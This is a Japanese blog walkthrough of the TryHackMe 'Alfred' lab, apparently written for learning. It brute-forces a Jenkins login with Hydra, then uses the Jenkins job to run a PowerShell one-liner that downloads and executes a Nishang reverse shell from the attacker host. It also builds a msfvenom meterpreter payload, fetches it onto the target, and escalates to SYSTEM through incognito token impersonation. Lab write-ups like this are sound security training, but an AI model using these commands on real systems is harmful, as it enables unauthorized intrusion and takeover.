TryHackMeのAlfredというマシーンのWriteUp。
ウォークスルー形式なのですんなりといけるはず。
data:image/s3,"s3://crabby-images/02dbf/02dbff61e282e12be6965705d223461596ec1ee1" alt=""
Alfredについて
主にPowerShellのリバースシェル確立とmeterpreterでの権限昇格について学習できるマシン。
Task1:Initial Access
Question1:開放しているポートの数は?
まずはnmapでスキャン。
/etc/hostsファイルにthm.localとしてターゲットのIPが登録してある前提。
$nmap -sV -A -Pn -T4 -oN nmap_report -vv thm.local
data:image/s3,"s3://crabby-images/530c7/530c73a6e7977a84ef1133d2b222b4dab68aa9ce" alt=""
ということで答えは3つ。
Question2:ログイン画面のユーザー名とパスワードは?
先ほどのポートスキャン結果から、80ポートと8080ポートでhttpサーバが稼働していることが分かった。
Webブラウザでアクセスしてみる。
http://thm.local/
data:image/s3,"s3://crabby-images/4f3e1/4f3e15ee55c33654af016ba1c49cc900bc730015" alt=""
バットマン?
ソースコードを表示しても特に面白い情報はなかったので次へ。
http://thm.local:8080/
data:image/s3,"s3://crabby-images/8935c/8935ca894fb8e941dbebc963cb261c9009ef4941" alt=""
Jenkinsのログイン画面が表示された。
問題のログイン画面とはこちらのこと。
Hydraで攻略するので、まずはBurpSuiteを起動。
data:image/s3,"s3://crabby-images/bdd82/bdd82841100bd5c67a147718b7503dfe742becdb" alt=""
ブラウザのプロキシサーバとしてBurpSuiteを指定した後、おためしにログインクエリを送ってみる。
ユーザ名はadmin、パスワードはtestpasswordとして実行。
data:image/s3,"s3://crabby-images/862f4/862f44080c8bfc1f4ed489416b160cf9457db0ed" alt=""
そして当然ログイン認証は失敗。
data:image/s3,"s3://crabby-images/aaf8e/aaf8ec56d58a52e286851d888ae7c1e9a2c47894" alt=""
BurpSuiteを確認すると、該当するPOSTリクエストがあった。
data:image/s3,"s3://crabby-images/6c31f/6c31f3a9a51abb64c6baef1895dacd683894042e" alt=""
これらの情報をもとにBurpSuiteの構文をつくる。
$hydra -l admin -P /usr/share/wordlists/rockyou.txt thm.local -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:F=Invalid" -V -t 64 -I
その結果、パスワードはadminと判明。
Question3:NishangのPowrshellリバースシェルを使う
Nishangは攻撃系の役立ちツールのまとめパック。まるごとダウンロードしておくのがベスト。
まずはログイン画面で認証し、Jenkinsにログインする。
data:image/s3,"s3://crabby-images/e9236/e923666afab889db0e327c3cea88b1ec6e8cf7a2" alt=""
projectというジョブがあるので選択する。
そして設定画面まで進んでいくと、どうもWindowsのコマンドプロンプトを実行できそうな枠を発見。ここでコマンドプロンプト構文を設定し、Nishangのリバースシェルを実行する。
まずは、このNishangのInvoke-PowerShellTcp.ps1があるディレクトリで、Powershell配信用のhttpサーバを動かす。
data:image/s3,"s3://crabby-images/09784/0978491fc4db56d9211a7155b9c74add7fdee137" alt=""
そして、待ち受け用のnetcatを設定。
data:image/s3,"s3://crabby-images/33306/333065604fae96fcbafcd10305956d68284d5466" alt=""
次に、コマンドプロンプトで実行する構文として
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
を設定する。
data:image/s3,"s3://crabby-images/8af8f/8af8f8fb4cc3845a7b63394b76d7dc07716aea2d" alt=""
起動するとリバースシェルが確立される。
data:image/s3,"s3://crabby-images/c5d46/c5d46d6ca878ea9e17f9e76ffe98d6c85f758452" alt=""
Question4:user.txtのフラッグの内容は?
実は上で確立したリバースシェルはお手ごろだが不安定。
ちょっとした構文エラーでも落ちてしまうため、安定させる必要がある。
そのため、ウォークスルーとは少し違うが、リバースシェルを立て直すことにした。
まずはmsfvenomでWindows用リバースシェルを作り、Httpサーバで配信できるようにする。
data:image/s3,"s3://crabby-images/1eb23/1eb238f739987233f9f41f1b238cf313886fb6d1" alt=""
そして、先ほどのリバースシェルからダウンロードして実行。
data:image/s3,"s3://crabby-images/93d24/93d242546e3610ec1bb71681f498a28781992b25" alt=""
リバースシェルの作り直しに成功した。
data:image/s3,"s3://crabby-images/b1361/b1361404f5d22994b81efc545ac52dbd9eb6f4f1" alt=""
そして、C:¥直下を検索してflagをゲット。
data:image/s3,"s3://crabby-images/59487/5948702d246cf515406ff9a713a2f35444c2effa" alt=""
Task2:Switching Shells
Question1:作ったペイロードのサイズは?
このタスクはクエスチョンにこたえるというよりはウォークスルーに従って進めるタイプ。
目的は、meterpreterのShellに変更すること。
まずはmsfvenomでmeterpreter用リバースシェルバイナリを作る。
$msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.5.162 LPORT=4446 -f exe -o shell-name.exe
続けてPython3のhttpサーバーで配信準備。
$python3 -m http.server 8001
その後、確立中のリバースシェルに戻り、ダウンロード。
>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.5.162:8001/shell-name.exe','shell-name.exe')"
次にmetasploitでmeterpreterのリバースシェル待ち受けの準備をする。
まずは起動。
data:image/s3,"s3://crabby-images/703ae/703ae39f7b4495aa46b096b0bf420a478fe8bb4a" alt=""
そして
- multi/handlerモジュールのセット
- Windows用meterpreter(reverse_tcp)のセット
- オプションの設定
- 実行
をすれば待ち受けを開始する。
data:image/s3,"s3://crabby-images/dd4e4/dd4e43f604558941204262c1665ced64b674ac53" alt=""
続けて、現在確立中のリバースシェルからmsfvenomのバイナリを実行する。
data:image/s3,"s3://crabby-images/c5199/c5199c703623fa28c18c1a72099bb39a2be24512" alt=""
するとmeterpreterでリバースシェルが確立する。
data:image/s3,"s3://crabby-images/24917/24917d5e4d305d4492efd7a1b577bcdac89251c0" alt=""
問いの答えは先ほどのmsfvenomコマンドで作ったバイナリから調べるとよし。
Task3:Privilege Escalation
Question1:whoami/privの結果は?
今回利用するのはアクセストークンに関する脆弱性。
アクセストークンとは、各アカウントに与えられたもの。
primary access tokensとimpersonation tokensがある。
前者はログオン時にアカウントに紐づけられるもので、後者はプロセスが別のプロセスのトークンでリソースにアクセスできるようにするためのもの。
ひとまずwhoami/privを入力する。
これは先ほどのリバースシェルで入力する。
data:image/s3,"s3://crabby-images/97a33/97a3376473fbf992aa3c1562b753909396615dcb" alt=""
Question2:incognitoをロードする
上の実行結果を見てみると、いくつかのPrivilegeNameがEnableになっているとわかる。
例えば、SeImpersonatePrivilegeやSeDebugPrivilege。
meterpreterでincognitoモジュールを読み込む。
data:image/s3,"s3://crabby-images/7d598/7d598450b17a91d040472d5ab91377e4afa7dfd4" alt=""
incognitoについて詳細はこちら。
Question3:権限昇格をする
アクセストークンの詳細を確認するため、meterpreterでリスト表示する。
data:image/s3,"s3://crabby-images/dba9b/dba9bb6607690f6345ce7b8157405f3ed28e1d74" alt=""
今回は-gオプションのとおり、グループごと表示としている。
TryHackMeのページには各impersonation tokensについてこのように表記されている。
data:image/s3,"s3://crabby-images/518c9/518c95146f3ffbf8ec2d07a1216497dd0b3a85f5" alt=""
要するに、SecurityDelegationは最高にヤバいってこと。
いましがたのTokenのリスト表示を見てみると、Delegation Tokens Availableという項目にいろいろとあるのがわかる。
今回は上にあるBUILTIN/Administratorを使う。
data:image/s3,"s3://crabby-images/e57d1/e57d1b00648dd122fcda7b450cecbf7708ed000a" alt=""
System権限に昇格した。
Question3:他プロセスへの移植
ただ、これでは問題があるそう。
というのも、このSystem権限というのは、Windowsのハンドルに関するパーミッションであって、impersonated tokensではない。
つまり、プロセスを動かしたりはできない。
そこで、プロセスの移植をする。
いわゆるmigrateのことで、System権限で動いているプロセスを指定すればよい。
まずはプロセスを検索。
data:image/s3,"s3://crabby-images/8dd77/8dd773c675723efb0a35df2dd89effa9b88be9f2" alt=""
service.exeがPID668で動いているのでそこにmigrateする。
data:image/s3,"s3://crabby-images/37786/37786e5267075fb3ee7892dc4cd06f6cd9030f55" alt=""
Question4:root.txtを開く
>search -f root.txt
>cat ~~~~~~~\root.txt
でOK。
まとめ
短いウォークスルーだったが、いろいろ学ぶことができた。
アクセストークンについてはいまいち理解ができなかったので、別口で学習を進めたい。
コメント